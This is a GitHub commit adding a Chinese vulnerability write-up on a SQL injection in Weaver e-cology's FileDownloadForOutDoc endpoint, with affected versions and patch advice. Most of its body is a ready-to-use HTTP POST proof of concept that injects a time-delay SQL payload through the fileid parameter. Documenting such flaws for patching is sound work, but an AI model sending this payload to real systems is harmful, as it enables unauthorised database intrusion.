-
Notifications
You must be signed in to change notification settings - Fork 401
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Upload new file: 泛微 OA e-cology FileDownloadForOutDoc 前台 SQL 注入漏洞.md …
…via simpread
- Loading branch information
Showing
1 changed file
with
74 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,74 @@ | ||
> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/Qnmy1vRfE4WBu4hyhBNkQg) | ||
**本文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。** | ||
|
||
**漏洞说明** | ||
|
||
泛微 e-cology 是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。 | ||
|
||
泛微 e-cology FileDownloadForOutDoc 未对用户的输入进行有效的过滤,直接将其拼接进了 SQL 查询语句中,导致系统出现 SQL 注入漏洞。 | ||
|
||
**影响版本** | ||
|
||
``` | ||
部分e-cology 8且补丁版本<10.58.0 | ||
部分e-cology 9且补丁版本<10.58.0 | ||
``` | ||
|
||
**漏洞复现** | ||
|
||
![](https://mmbiz.qpic.cn/sz_mmbiz_png/y0627QbVVbV81PXWiaokevaYtVIUE3dFKGpEib1Z8ibptFyRg3ibBo0LEMx8hOlgU8fSCcx3CHs49wTcszfX0PVOpg/640?wx_fmt=png) | ||
|
||
payload: | ||
|
||
``` | ||
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1 | ||
Host: ip:port | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36 | ||
Content-Length: 45 | ||
Content-Type: application/x-www-form-urlencoded | ||
Accept-Encoding: gzip, deflate | ||
Connection: close | ||
fileid=3+WAITFOR+DELAY+'0:0:8'&isFromOutImg=1 | ||
``` | ||
|
||
请求包: | ||
|
||
``` | ||
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1 | ||
Host: ip:port | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36 | ||
Content-Length: 45 | ||
Content-Type: application/x-www-form-urlencoded | ||
Accept-Encoding: gzip, deflate | ||
Connection: close | ||
fileid={everything}+WAITFOR+DELAY+'0:0:8'&isFromOutImg=1 | ||
``` | ||
|
||
响应包: | ||
|
||
``` | ||
HTTP/1.1 200 OK | ||
Server: WVS | ||
Cache-Control: private | ||
X-Frame-Options: SAMEORIGIN | ||
X-XSS-Protection: 1 | ||
Set-Cookie: ecology_JSessionid=aaag6HUJ_5F8Y8MrDt2Ky; path=/ | ||
Content-Length: 0 | ||
Connection: close | ||
Date: Tue, 11 Jul 2023 12:54:14 GMT | ||
``` | ||
|
||
![](https://mmbiz.qpic.cn/sz_mmbiz_png/y0627QbVVbV81PXWiaokevaYtVIUE3dFKIuMdp7CDcO2YpprpVlibed6mX6AqasDA6q1ia2Dhcs3O7QB9TjU95fJg/640?wx_fmt=png) | ||
|
||
**修复建议** | ||
|
||
目前官方已发布安全补丁,建议受影响用户尽快将补丁版本升级至 10.58 及以上。https://www.weaver.com.cn/cs/securityDownload.asp# | ||
|
||
本文章仅用于学习交流,不得用于非法用途 | ||
|
||
星标加关注,追洞不迷路 |